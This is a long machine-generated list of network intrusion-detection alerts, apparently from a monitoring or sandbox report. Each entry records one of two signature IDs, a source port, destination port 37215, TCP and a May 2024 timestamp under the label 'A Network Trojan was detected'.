            SID:2829579
            Source Port:54862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824604
            SID:2835222
            Source Port:47278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827931
            SID:2829579
            Source Port:56940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741457
            SID:2835222
            Source Port:44164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.262238
            SID:2829579
            Source Port:54408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014558
            SID:2829579
            Source Port:35976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573108
            SID:2829579
            Source Port:56412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900682
            SID:2829579
            Source Port:34960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507393
            SID:2835222
            Source Port:44592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847719
            SID:2835222
            Source Port:43226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.325820
            SID:2835222
            Source Port:60440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772479
            SID:2829579
            Source Port:35686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739188
            SID:2835222
            Source Port:60098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714759
            SID:2829579
            Source Port:60602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.740793
            SID:2835222
            Source Port:43900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.830632
            SID:2829579
            Source Port:41514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.816109
            SID:2835222
            Source Port:37990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837241
            SID:2835222
            Source Port:43752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047873
            SID:2829579
            Source Port:50642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968798
            SID:2835222
            Source Port:41098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058503
            SID:2829579
            Source Port:32912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.777162
            SID:2829579
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866475
            SID:2835222
            Source Port:53466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541206
            SID:2835222
            Source Port:37594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651642
            SID:2835222
            Source Port:54668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.484421
            SID:2835222
            Source Port:54852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505353
            SID:2835222
            Source Port:50248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771520
            SID:2835222
            Source Port:40566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933909
            SID:2829579
            Source Port:37266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754636
            SID:2835222
            Source Port:47286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805416
            SID:2829579
            Source Port:45962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914180
            SID:2835222
            Source Port:52180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557442
            SID:2835222
            Source Port:46236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.918722
            SID:2835222
            Source Port:57882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863882
            SID:2829579
            Source Port:59928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895914
            SID:2835222
            Source Port:60438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597073
            SID:2835222
            Source Port:60250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739137
            SID:2829579
            Source Port:40126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873416
            SID:2835222
            Source Port:51370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873685
            SID:2835222
            Source Port:43510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754491
            SID:2835222
            Source Port:45226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279734
            SID:2829579
            Source Port:57450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323370
            SID:2829579
            Source Port:33688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.873474
            SID:2829579
            Source Port:52560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064121
            SID:2829579
            Source Port:49208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014844
            SID:2829579
            Source Port:38710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059876
            SID:2835222
            Source Port:60256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.524912
            SID:2829579
            Source Port:43178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727708
            SID:2835222
            Source Port:39418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002320
            SID:2829579
            Source Port:58070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459377
            SID:2829579
            Source Port:47440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.992518
            SID:2835222
            Source Port:33396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575323
            SID:2829579
            Source Port:33328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870290
            SID:2829579
            Source Port:35440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065234
            SID:2835222
            Source Port:60618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039850
            SID:2835222
            Source Port:43090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808139
            SID:2835222
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320277
            SID:2829579
            Source Port:52556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969163
            SID:2829579
            Source Port:58414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777826
            SID:2829579
            Source Port:35992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988279
            SID:2835222
            Source Port:37138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327400
            SID:2835222
            Source Port:55626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.858266
            SID:2829579
            Source Port:34672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941692
            SID:2829579
            Source Port:38622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925580
            SID:2835222
            Source Port:58264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065089
            SID:2829579
            Source Port:41776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039313
            SID:2835222
            Source Port:42262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735066
            SID:2829579
            Source Port:35498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967467
            SID:2835222
            Source Port:53086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989138
            SID:2835222
            Source Port:53654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953360
            SID:2835222
            Source Port:48094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316987
            SID:2835222
            Source Port:60016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944307
            SID:2829579
            Source Port:55216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728810
            SID:2835222
            Source Port:36106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.072515
            SID:2835222
            Source Port:53424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929036
            SID:2829579
            Source Port:37130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772648
            SID:2835222
            Source Port:34918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051465
            SID:2835222
            Source Port:44904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859685
            SID:2829579
            Source Port:42732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010443
            SID:2835222
            Source Port:43446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940978
            SID:2829579
            Source Port:34078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837555
            SID:2835222
            Source Port:35960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856362
            SID:2835222
            Source Port:48310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877593
            SID:2829579
            Source Port:52628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995842
            SID:2835222
            Source Port:59894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473477
            SID:2829579
            Source Port:45212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993353
            SID:2835222
            Source Port:49852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818322
            SID:2829579
            Source Port:45538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899873
            SID:2835222
            Source Port:43624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065855
            SID:2829579
            Source Port:46524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892565
            SID:2835222
            Source Port:57424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.592238
            SID:2829579
            Source Port:52866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990329
            SID:2835222
            Source Port:53470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.024987
            SID:2829579
            Source Port:50972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899499
            SID:2835222
            Source Port:34464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034873
            SID:2835222
            Source Port:34808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770743
            SID:2835222
            Source Port:60936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047418
            SID:2835222
            Source Port:32772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524300
            SID:2829579
            Source Port:59532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901258
            SID:2835222
            Source Port:34268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953208
            SID:2835222
            Source Port:60154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837799
            SID:2829579
            Source Port:59910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.884761
            SID:2835222
            Source Port:45800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919383
            SID:2829579
            Source Port:41822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026377
            SID:2835222
            Source Port:32852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.862114
            SID:2835222
            Source Port:47378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823216
            SID:2829579
            Source Port:53088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764716
            SID:2829579
            Source Port:40834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995179
            SID:2829579
            Source Port:43732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834462
            SID:2835222
            Source Port:44426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.358548
            SID:2835222
            Source Port:33006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811667
            SID:2829579
            Source Port:52830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394469
            SID:2829579
            Source Port:48944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443213
            SID:2829579
            Source Port:40888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027592
            SID:2835222
            Source Port:34068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004693
            SID:2835222
            Source Port:56004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748372
            SID:2829579
            Source Port:45874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817697
            SID:2829579
            Source Port:42708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967096
            SID:2835222
            Source Port:46722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879566
            SID:2835222
            Source Port:47262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525963
            SID:2829579
            Source Port:59150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059995
            SID:2829579
            Source Port:39142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783555
            SID:2835222
            Source Port:42268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488897
            SID:2835222
            Source Port:47370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561042
            SID:2829579
            Source Port:34452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012483
            SID:2835222
            Source Port:35604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.705122
            SID:2829579
            Source Port:57432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872718
            SID:2829579
            Source Port:59742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790122
            SID:2829579
            Source Port:58668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809853
            SID:2829579
            Source Port:38430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026620
            SID:2835222
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321623
            SID:2829579
            Source Port:52932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435516
            SID:2829579
            Source Port:43524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741478
            SID:2835222
            Source Port:47714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871674
            SID:2835222
            Source Port:53472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766751
            SID:2835222
            Source Port:43532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400053
            SID:2835222
            Source Port:47116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956848
            SID:2835222
            Source Port:48954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753779
            SID:2829579
            Source Port:32814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906405
            SID:2835222
            Source Port:32848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019243
            SID:2829579
            Source Port:46780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317234
            SID:2835222
            Source Port:55858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280307
            SID:2829579
            Source Port:33744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.812635
            SID:2829579
            Source Port:54568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840272
            SID:2829579
            Source Port:52970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330424
            SID:2829579
            Source Port:59178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048711
            SID:2829579
            Source Port:43620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.744373
            SID:2829579
            Source Port:34644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741442
            SID:2835222
            Source Port:51990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334355
            SID:2835222
            Source Port:53202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231190
            SID:2829579
            Source Port:44912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.475555
            SID:2835222
            Source Port:49026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663976
            SID:2829579
            Source Port:49368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841184
            SID:2835222
            Source Port:43056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915060
            SID:2835222
            Source Port:47942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321232
            SID:2829579
            Source Port:35416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516064
            SID:2835222
            Source Port:46924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872319
            SID:2835222
            Source Port:36930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261731
            SID:2829579
            Source Port:41128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857022
            SID:2835222
            Source Port:60512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533505
            SID:2835222
            Source Port:47146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047544
            SID:2829579
            Source Port:50542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.340075
            SID:2829579
            Source Port:53412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623370
            SID:2835222
            Source Port:46460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918162
            SID:2829579
            Source Port:42044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.656464
            SID:2835222
            Source Port:42792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423238
            SID:2835222
            Source Port:37768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645655
            SID:2835222
            Source Port:40548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772454
            SID:2835222
            Source Port:45944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745560
            SID:2835222
            Source Port:46612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827628
            SID:2835222
            Source Port:36188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557074
            SID:2829579
            Source Port:49626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842737
            SID:2835222
            Source Port:38116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839995
            SID:2829579
            Source Port:44168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.343899
            SID:2835222
            Source Port:43158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033383
            SID:2829579
            Source Port:35360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002403
            SID:2835222
            Source Port:34132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988272
            SID:2835222
            Source Port:60530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565236
            SID:2835222
            Source Port:53940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.767009
            SID:2835222
            Source Port:41390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869871
            SID:2835222
            Source Port:58364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881267
            SID:2829579
            Source Port:51552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709926
            SID:2829579
            Source Port:41356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930012
            SID:2835222
            Source Port:46954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299712
            SID:2835222
            Source Port:49598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543210
            SID:2835222
            Source Port:60486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869555
            SID:2835222
            Source Port:45980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920043
            SID:2829579
            Source Port:43072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.938315
            SID:2835222
            Source Port:56854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547503
            SID:2829579
            Source Port:60544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870687
            SID:2835222
            Source Port:47104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878875
            SID:2829579
            Source Port:43674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936209
            SID:2829579
            Source Port:46614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.054091
            SID:2835222
            Source Port:36002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.794042
            SID:2829579
            Source Port:59620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875171
            SID:2835222
            Source Port:59210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.072579
            SID:2835222
            Source Port:54066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925831
            SID:2829579
            Source Port:51082
            Destination Port:37215
